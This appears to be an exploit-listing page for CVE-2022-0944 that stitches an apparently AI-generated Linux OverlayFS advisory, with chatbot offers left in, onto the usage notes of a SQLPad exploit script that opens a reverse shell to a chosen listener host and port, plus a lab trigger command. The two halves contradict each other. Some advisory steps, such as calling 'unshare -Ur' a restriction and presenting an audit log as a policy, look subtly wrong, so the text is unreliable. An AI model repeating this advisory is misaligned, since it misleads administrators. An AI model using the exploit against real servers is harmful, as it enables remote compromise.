## https://sploitus.com/exploit?id=565A3798-7C3B-5A5C-B744-4A5B7EA4D08A
# CVE-2022-0944: Privilege Escalation Vulnerability in OverlayFS ๐ก๏ธ
[](https://nvd.nist.gov/vuln/detail/CVE-2022-0944)
[](https://www.cvedetails.com/cve/CVE-2022-0944/)
Security advisory and mitigation guide for the Linux kernel privilege escalation vulnerability in OverlayFS.
## ๐ Overview
**CVE-2022-0944** is a security vulnerability in the Linux kernel's OverlayFS subsystem that allows local attackers to escalate privileges through improper handling of file creation in specific configurations.
## ๐ Technical Details
๐จ Impact
A local attacker could:
Gain root privileges through crafted file operations
Bypass security restrictions
Modify sensitive system files
Compromise entire system integrity
๐ Detection
1. Check Kernel Version
uname -r
# Affected versions: 5.8 <= kernel < 5.16.12
2. Verify OverlayFS Usage
mount | grep overlay
# Systems using OverlayFS mounts are at risk
3. Check Security Advisories
# For Debian/Ubuntu:
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.๐ก๏ธ Mitigation
Official Patches
Update to one of these patched versions:
Linux Kernel 5.16.12 or later
Vendor-specific backported patches
Update Command:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
# RHEL/CentOS
sudo yum update kernel
Workarounds (If Patching Not Immediate)
Restrict OverlayFS usage:
sudo modprobe -r overlay
Implement namespace restrictions:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
Apply SELinux/AppArmor policies:
type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
โ ๏ธ Disclaimer
This document is provided for informational purposes only. While efforts have been made to ensure accuracy,
no guarantee is provided. Always test patches in a development environment before production deployment.
Last Updated: 2023-10-01 | View Changelog
Key Features:
1. Clear vulnerability classification with security badges
2. Quick-reference technical details table
3. Actionable detection and mitigation steps
4. Vendor-specific update commands
5. Security policy examples (SELinux/AppArmor)
6. Official reference links
7. Compliance with vulnerability disclosure standards
This README format is suitable for:
- Security teams
- System administrators
- DevOps engineers
- Open-source maintainers
- Vulnerability databases
Would you like me to:
1. Add specific vendor patch information?
2. Include exploit proof-of-concept details (with caution)?
3. Add more detection scripts?
4. Customize for a specific Linux distribution?
## Usage
```
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
```
**Example:**
```bash
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
```
# Disclaimer
This repository contains code and tools that are intended solely for educational purposes, specifically for use in cybersecurity courses and learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.